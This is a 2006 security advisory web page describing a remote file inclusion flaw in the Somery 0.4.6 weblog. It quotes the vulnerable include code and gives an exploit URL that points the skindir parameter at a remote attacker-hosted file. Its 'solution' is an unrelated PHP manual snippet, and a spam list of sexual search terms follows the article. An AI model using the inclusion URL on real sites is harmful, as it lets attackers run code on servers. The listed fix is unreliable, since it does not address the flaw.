about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability



2006-09-08 Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability
Rated as : Moderate Risk

Update:
16:01 09/08/06

Subject:
"Somery 0.4(skin_dir)Remote File Inclusion Exploit"

Vulnerable version:
 Somery 0.4.6

Operating System:
- All OS

Vendor URL:
Robin de Graaf - voh@hostvoh.net
Somery website - http://somery.danwa.net

Description:
Somery, also known as the Somery weblogging system.

Vulnerability:
An error accoured when sending a specified string code at include
function
Varibale scope at the line for request was not except how they handle
failure.include() does not behave this way, the script will continue

regardless.include() produces a Warning while require() results in a Fatal
Error.
see vulnerability script;

// upload/admin/system/include.php

if ($start) {
       include("../config.php");
       include("cookies.php");
       include("system/error.php");
       include("system/functions.php");
       include("system/authorization.php");
       include("$skindir/header.php"); // is invalid code
} else {
       if (!$checkauth) {
               $login = TRUE;
               include("login.php");
       }
       include("$skindir/footer.php"); // is invalid code
}

Exploit:
//          =============XCRIME-CYBER============
//          Somery 0.4(skin_dir)Remote File Inclusion Exploit
//          ======================================
//                              basher13 - Infam0us Gr0up
Usage:
http://[domain]/[path]/upload/admin/system/include.php?skindir=http://[url_inclusion_exploit]

Solution:
PHP Manual(PHP 3, PHP 4, PHP 5)
Defined --  Checks whether a given named constant exists
<?php
/* Note the use of quotes, this is important.  This example is checking
 * if the string 'CONSTANT' is the name of a constant named CONSTANT */
if (defined('CONSTANT')) {
   echo CONSTANT;
}
?>

Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / www.xcrime-cyber.pro.tc
securitydot.net - 2006-09-08

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:54:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
5UP0X0ANPE www.saxe.c Wallpapers japansex.c SLAZYDREAM p...%5C%5C Free sex c freedownlo news for c www.myspaa SLAZYDREAM i...umy.ua Freeporn Sextoons.c www.sex98. redtub SEXY.VIDEO Savixx.com Rani mukha Sextoons.c SANIA MIRZ porntv Free sex S mambo Remo free sexyp sexy girl pakistan s sex horse CMS is Fre Free xxxmo maroc.zic. maroc.zic. Sax image Www.xnx.co free anima Free nude Sex poto www.99bb.c Www.89.con Sear maroc.zic. mambo Remo Sear www.99bb.c unlock beb B B C Urdu Tamil sex Free xxx Sex vedios Www.animal